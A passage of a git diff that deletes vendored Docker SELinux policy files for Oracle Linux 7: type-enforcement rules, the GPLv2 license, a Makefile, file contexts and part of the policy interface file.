-fs_read_cgroup_files(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_search_all(docker_t) -fs_getattr_all_fs(docker_t) - -storage_raw_rw_fixed_disk(docker_t) - -auth_use_nsswitch(docker_t) -auth_dontaudit_getattr_shadow(docker_t) - -init_read_state(docker_t) -init_status(docker_t) - -logging_send_audit_msgs(docker_t) -logging_send_syslog_msg(docker_t) - -miscfiles_read_localization(docker_t) - -mount_domtrans(docker_t) - -seutil_read_default_contexts(docker_t) -seutil_read_config(docker_t) - -sysnet_dns_name_resolve(docker_t) -sysnet_exec_ifconfig(docker_t) - -optional_policy(` - rpm_exec(docker_t) - rpm_read_db(docker_t) - rpm_exec(docker_t) -') - -optional_policy(` - fstools_domtrans(docker_t) -') - -optional_policy(` - iptables_domtrans(docker_t) -') - -optional_policy(` - openvswitch_stream_connect(docker_t) -') - -# -# lxc rules -# - -allow docker_t self:capability { dac_override setgid setpcap setuid sys_admin sys_boot sys_chroot sys_ptrace }; - -allow docker_t self:process { getcap setcap setexec setpgid setsched signal_perms }; - -allow docker_t self:netlink_route_socket rw_netlink_socket_perms;; -allow docker_t self:netlink_audit_socket create_netlink_socket_perms; -allow docker_t self:unix_dgram_socket { create_socket_perms sendto }; -allow docker_t self:unix_stream_socket { create_stream_socket_perms connectto }; - -allow docker_t docker_var_lib_t:dir mounton; -allow docker_t docker_var_lib_t:chr_file mounton; -can_exec(docker_t, docker_var_lib_t) - -kernel_dontaudit_setsched(docker_t) -kernel_get_sysvipc_info(docker_t) -kernel_request_load_module(docker_t) -kernel_mounton_messages(docker_t) -kernel_mounton_all_proc(docker_t) -kernel_mounton_all_sysctls(docker_t) -kernel_unlabeled_entry_type(spc_t) -kernel_unlabeled_domtrans(docker_t, spc_t) - -dev_getattr_all(docker_t) -dev_getattr_sysfs_fs(docker_t) -dev_read_urand(docker_t) -dev_read_lvm_control(docker_t) -dev_rw_sysfs(docker_t) -dev_rw_loop_control(docker_t) -dev_rw_lvm_control(docker_t) - 
-files_getattr_isid_type_dirs(docker_t) -files_manage_isid_type_dirs(docker_t) -files_manage_isid_type_files(docker_t) -files_manage_isid_type_symlinks(docker_t) -files_manage_isid_type_chr_files(docker_t) -files_manage_isid_type_blk_files(docker_t) -files_exec_isid_files(docker_t) -files_mounton_isid(docker_t) -files_mounton_non_security(docker_t) -files_mounton_isid_type_chr_file(docker_t) - -fs_mount_all_fs(docker_t) -fs_unmount_all_fs(docker_t) -fs_remount_all_fs(docker_t) -files_mounton_isid(docker_t) -fs_manage_cgroup_dirs(docker_t) -fs_manage_cgroup_files(docker_t) -fs_relabelfrom_xattr_fs(docker_t) -fs_relabelfrom_tmpfs(docker_t) -fs_read_tmpfs_symlinks(docker_t) -fs_list_hugetlbfs(docker_t) - -term_use_generic_ptys(docker_t) -term_use_ptmx(docker_t) -term_getattr_pty_fs(docker_t) -term_relabel_pty_fs(docker_t) -term_mounton_unallocated_ttys(docker_t) - -modutils_domtrans_insmod(docker_t) - -systemd_status_all_unit_files(docker_t) -systemd_start_systemd_services(docker_t) - -userdom_stream_connect(docker_t) -userdom_search_user_home_content(docker_t) -userdom_read_all_users_state(docker_t) -userdom_relabel_user_home_files(docker_t) -userdom_relabel_user_tmp_files(docker_t) -userdom_relabel_user_tmp_dirs(docker_t) - -optional_policy(` - gpm_getattr_gpmctl(docker_t) -') - -optional_policy(` - dbus_system_bus_client(docker_t) - init_dbus_chat(docker_t) - init_start_transient_unit(docker_t) - - optional_policy(` - systemd_dbus_chat_logind(docker_t) - systemd_dbus_chat_machined(docker_t) - ') - - optional_policy(` - firewalld_dbus_chat(docker_t) - ') -') - -optional_policy(` - udev_read_db(docker_t) -') - -optional_policy(` - unconfined_domain(docker_t) - unconfined_typebounds(docker_t) -') - -optional_policy(` - virt_read_config(docker_t) - virt_exec(docker_t) - virt_stream_connect(docker_t) - virt_stream_connect_sandbox(docker_t) - virt_exec_sandbox_files(docker_t) - virt_manage_sandbox_files(docker_t) - virt_relabel_sandbox_filesystem(docker_t) - # for lxc - 
virt_transition_svirt_sandbox(docker_t, system_r) - virt_mounton_sandbox_file(docker_t) -# virt_attach_sandbox_tun_iface(docker_t) - allow docker_t svirt_sandbox_domain:tun_socket relabelfrom; - virt_sandbox_entrypoint(docker_t) -') - -tunable_policy(`docker_connect_any',` - corenet_tcp_connect_all_ports(docker_t) - corenet_sendrecv_all_packets(docker_t) - corenet_tcp_sendrecv_all_ports(docker_t) -') - -######################################## -# -# spc local policy -# -allow spc_t { docker_var_lib_t docker_share_t }:file entrypoint; -role system_r types spc_t; - -domtrans_pattern(docker_t, docker_share_t, spc_t) -domtrans_pattern(docker_t, docker_var_lib_t, spc_t) -allow docker_t spc_t:process { setsched signal_perms }; -ps_process_pattern(docker_t, spc_t) -allow docker_t spc_t:socket_class_set { relabelto relabelfrom }; -filetrans_pattern(docker_t, docker_var_lib_t, docker_share_t, dir, "overlay") - -optional_policy(` - systemd_dbus_chat_machined(spc_t) -') - -optional_policy(` - dbus_chat_system_bus(spc_t) -') - -optional_policy(` - unconfined_domain_noaudit(spc_t) -') - -optional_policy(` - virt_transition_svirt_sandbox(spc_t, system_r) - virt_sandbox_entrypoint(spc_t) -') - -######################################## -# -# docker_auth local policy -# -allow docker_auth_t self:fifo_file rw_fifo_file_perms; -allow docker_auth_t self:unix_stream_socket create_stream_socket_perms; -dontaudit docker_auth_t self:capability net_admin; - -docker_stream_connect(docker_auth_t) - -manage_dirs_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_sock_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -manage_lnk_files_pattern(docker_auth_t, docker_plugin_var_run_t, docker_plugin_var_run_t) -files_pid_filetrans(docker_auth_t, docker_plugin_var_run_t, { dir file lnk_file sock_file }) - -domain_use_interactive_fds(docker_auth_t) - 
-kernel_read_net_sysctls(docker_auth_t) - -auth_use_nsswitch(docker_auth_t) - -files_read_etc_files(docker_auth_t) - -miscfiles_read_localization(docker_auth_t) - -sysnet_dns_name_resolve(docker_auth_t) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE deleted file mode 100644 index d511905c16..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE +++ /dev/null @@ -1,339 +0,0 @@ - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. 
- - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. 
The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. 
- - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. 
- -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. 
However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. 
-You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. 
If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - - How to Apply These Terms to Your New Programs - - If you develop a new program, and you want it to be of the greatest -possible use to the public, the best way to achieve this is to make it -free software which everyone can redistribute and change under these terms. - - To do so, attach the following notices to the program. It is safest -to attach them to the start of each source file to most effectively -convey the exclusion of warranty; and each file should have at least -the "copyright" line and a pointer to where the full notice is found. - - - Copyright (C) - - This program is free software; you can redistribute it and/or modify - it under the terms of the GNU General Public License as published by - the Free Software Foundation; either version 2 of the License, or - (at your option) any later version. 
- - This program is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the - GNU General Public License for more details. - - You should have received a copy of the GNU General Public License along - with this program; if not, write to the Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. - -Also add information on how to contact you by electronic and paper mail. - -If the program is interactive, make it output a short notice like this -when it starts in an interactive mode: - - Gnomovision version 69, Copyright (C) year name of author - Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'. - This is free software, and you are welcome to redistribute it - under certain conditions; type `show c' for details. - -The hypothetical commands `show w' and `show c' should show the appropriate -parts of the General Public License. Of course, the commands you use may -be called something other than `show w' and `show c'; they could even be -mouse-clicks or menu items--whatever suits your program. - -You should also get your employer (if you work as a programmer) or your -school, if any, to sign a "copyright disclaimer" for the program, if -necessary. Here is a sample; alter the names: - - Yoyodyne, Inc., hereby disclaims all copyright interest in the program - `Gnomovision' (which makes passes at compilers) written by James Hacker. - - , 1 April 1989 - Ty Coon, President of Vice - -This General Public License does not permit incorporating your program into -proprietary programs. If your program is a subroutine library, you may -consider it more useful to permit linking proprietary applications with the -library. If this is what you want to do, use the GNU Lesser General -Public License instead of this License. 
diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile deleted file mode 100644 index 16df33ef32..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -TARGETS?=docker -MODULES?=${TARGETS:=.pp.bz2} -SHAREDIR?=/usr/share - -all: ${TARGETS:=.pp.bz2} - -%.pp.bz2: %.pp - @echo Compressing $^ -\> $@ - bzip2 -9 $^ - -%.pp: %.te - make -f ${SHAREDIR}/selinux/devel/Makefile $@ - -clean: - rm -f *~ *.tc *.pp *.pp.bz2 - rm -rf tmp *.tar.gz - -man: install - sepolicy manpage --domain ${TARGETS}_t - -install: - semodule -i ${TARGETS} - diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md deleted file mode 100644 index 7ea3117a89..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md +++ /dev/null @@ -1 +0,0 @@ -SELinux policy for docker diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc deleted file mode 100644 index 10b7d52a8b..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc +++ /dev/null @@ -1,33 +0,0 @@ -/root/\.docker gen_context(system_u:object_r:docker_home_t,s0) - -/usr/bin/docker -- gen_context(system_u:object_r:docker_exec_t,s0) -/usr/bin/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) -/usr/lib/docker/docker-novolume-plugin -- gen_context(system_u:object_r:docker_auth_exec_t,s0) - -/usr/lib/systemd/system/docker.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) 
-/usr/lib/systemd/system/docker-novolume-plugin.service -- gen_context(system_u:object_r:docker_unit_file_t,s0) - -/etc/docker(/.*)? gen_context(system_u:object_r:docker_config_t,s0) - -/var/lib/docker(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/kublet(/.*)? gen_context(system_u:object_r:docker_var_lib_t,s0) -/var/lib/docker/vfs(/.*)? gen_context(system_u:object_r:svirt_sandbox_file_t,s0) - -/var/run/docker(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.pid -- gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker\.sock -s gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker-client(/.*)? gen_context(system_u:object_r:docker_var_run_t,s0) -/var/run/docker/plugins(/.*)? gen_context(system_u:object_r:docker_plugin_var_run_t,s0) - -/var/lock/lxc(/.*)? gen_context(system_u:object_r:docker_lock_t,s0) - -/var/log/lxc(/.*)? gen_context(system_u:object_r:docker_log_t,s0) - -/var/lib/docker/init(/.*)? gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hosts gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/containers/.*/hostname gen_context(system_u:object_r:docker_share_t,s0) -/var/lib/docker/.*/config\.env gen_context(system_u:object_r:docker_share_t,s0) - -# OL7.2 systemd selinux update -/var/run/systemd/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_run_t,s0) -/var/lib/machines(/.*)? gen_context(system_u:object_r:systemd_machined_var_lib_t,s0) diff --git a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if b/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if deleted file mode 100644 index 4780af05f7..0000000000 --- a/vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if +++ /dev/null @@ -1,659 +0,0 @@ - -## The open-source application container engine. 
- -######################################## -## -## Execute docker in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_domtrans',` - gen_require(` - type docker_t, docker_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_exec_t, docker_t) -') - -######################################## -## -## Execute docker in the caller domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_exec',` - gen_require(` - type docker_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_exec_t) -') - -######################################## -## -## Search docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_search_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - files_search_var_lib($1) -') - -######################################## -## -## Execute docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_lib',` - gen_require(` - type docker_var_lib_t; - ') - - allow $1 docker_var_lib_t:dir search_dir_perms; - can_exec($1, docker_var_lib_t) -') - -######################################## -## -## Read docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_read_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - read_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Read docker share files. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_read_share_files',` - gen_require(` - type docker_share_t; - ') - - files_search_var_lib($1) - list_dirs_pattern($1, docker_share_t, docker_share_t) - read_files_pattern($1, docker_share_t, docker_share_t) - read_lnk_files_pattern($1, docker_share_t, docker_share_t) -') - -###################################### -## -## Allow the specified domain to execute docker shared files -## in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_exec_share_files',` - gen_require(` - type docker_share_t; - ') - - can_exec($1, docker_share_t) -') - -######################################## -## -## Manage docker lib files. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_files',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_files_pattern($1, docker_var_lib_t, docker_var_lib_t) - manage_lnk_files_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Manage docker lib directories. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_manage_lib_dirs',` - gen_require(` - type docker_var_lib_t; - ') - - files_search_var_lib($1) - manage_dirs_pattern($1, docker_var_lib_t, docker_var_lib_t) -') - -######################################## -## -## Create objects in a docker var lib directory -## with an automatic type transition to -## a specified private type. -## -## -## -## Domain allowed access. -## -## -## -## -## The type of the object to create. -## -## -## -## -## The class of the object to be created. -## -## -## -## -## The name of the object being created. -## -## -# -interface(`docker_lib_filetrans',` - gen_require(` - type docker_var_lib_t; - ') - - filetrans_pattern($1, docker_var_lib_t, $2, $3, $4) -') - -######################################## -## -## Read docker PID files. -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_read_pid_files',` - gen_require(` - type docker_var_run_t; - ') - - files_search_pids($1) - read_files_pattern($1, docker_var_run_t, docker_var_run_t) -') - -######################################## -## -## Execute docker server in the docker domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_systemctl',` - gen_require(` - type docker_t; - type docker_unit_file_t; - ') - - systemd_exec_systemctl($1) - init_reload_services($1) - systemd_read_fifo_file_passwd_run($1) - allow $1 docker_unit_file_t:file read_file_perms; - allow $1 docker_unit_file_t:service manage_service_perms; - - ps_process_pattern($1, docker_t) -') - -######################################## -## -## Read and write docker shared memory. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_rw_sem',` - gen_require(` - type docker_t; - ') - - allow $1 docker_t:sem rw_sem_perms; -') - -####################################### -## -## Read and write the docker pty type. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_use_ptys',` - gen_require(` - type docker_devpts_t; - ') - - allow $1 docker_devpts_t:chr_file rw_term_perms; -') - -####################################### -## -## Allow domain to create docker content -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_filetrans_named_content',` - - gen_require(` - type docker_var_lib_t; - type docker_share_t; - type docker_log_t; - type docker_var_run_t; - type docker_home_t; - ') - - files_pid_filetrans($1, docker_var_run_t, file, "docker.pid") - files_pid_filetrans($1, docker_var_run_t, sock_file, "docker.sock") - files_pid_filetrans($1, docker_var_run_t, dir, "docker-client") - logging_log_filetrans($1, docker_log_t, dir, "lxc") - files_var_lib_filetrans($1, docker_var_lib_t, dir, "docker") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "config.env") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hosts") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "hostname") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, file, "resolv.conf") - filetrans_pattern($1, docker_var_lib_t, docker_share_t, dir, "init") - userdom_admin_home_dir_filetrans($1, docker_home_t, dir, ".docker") -') - -######################################## -## -## Connect to docker over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_stream_connect',` - gen_require(` - type docker_t, docker_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_var_run_t, docker_var_run_t, docker_t) -') - -######################################## -## -## Connect to SPC containers over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_spc_stream_connect',` - gen_require(` - type spc_t, spc_var_run_t; - ') - - files_search_pids($1) - files_write_all_pid_sockets($1) - allow $1 spc_t:unix_stream_socket connectto; -') - -######################################## -## -## All of the rules required to administrate -## an docker environment -## -## -## -## Domain allowed access. 
-## -## -# -interface(`docker_admin',` - gen_require(` - type docker_t; - type docker_var_lib_t, docker_var_run_t; - type docker_unit_file_t; - type docker_lock_t; - type docker_log_t; - type docker_config_t; - ') - - allow $1 docker_t:process { ptrace signal_perms }; - ps_process_pattern($1, docker_t) - - admin_pattern($1, docker_config_t) - - files_search_var_lib($1) - admin_pattern($1, docker_var_lib_t) - - files_search_pids($1) - admin_pattern($1, docker_var_run_t) - - files_search_locks($1) - admin_pattern($1, docker_lock_t) - - logging_search_logs($1) - admin_pattern($1, docker_log_t) - - docker_systemctl($1) - admin_pattern($1, docker_unit_file_t) - allow $1 docker_unit_file_t:service all_service_perms; - - optional_policy(` - systemd_passwd_agent_exec($1) - systemd_read_fifo_file_passwd_run($1) - ') -') - -######################################## -## -## Execute docker_auth_exec_t in the docker_auth domain. -## -## -## -## Domain allowed to transition. -## -## -# -interface(`docker_auth_domtrans',` - gen_require(` - type docker_auth_t, docker_auth_exec_t; - ') - - corecmd_search_bin($1) - domtrans_pattern($1, docker_auth_exec_t, docker_auth_t) -') - -###################################### -## -## Execute docker_auth in the caller domain. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_exec',` - gen_require(` - type docker_auth_exec_t; - ') - - corecmd_search_bin($1) - can_exec($1, docker_auth_exec_t) -') - -######################################## -## -## Connect to docker_auth over a unix stream socket. -## -## -## -## Domain allowed access. -## -## -# -interface(`docker_auth_stream_connect',` - gen_require(` - type docker_auth_t, docker_plugin_var_run_t; - ') - - files_search_pids($1) - stream_connect_pattern($1, docker_plugin_var_run_t, docker_plugin_var_run_t, docker_auth_t) -') - -######################################## -## -## docker domain typebounds calling domain. -## -## -## -## Domain to be typebound. 
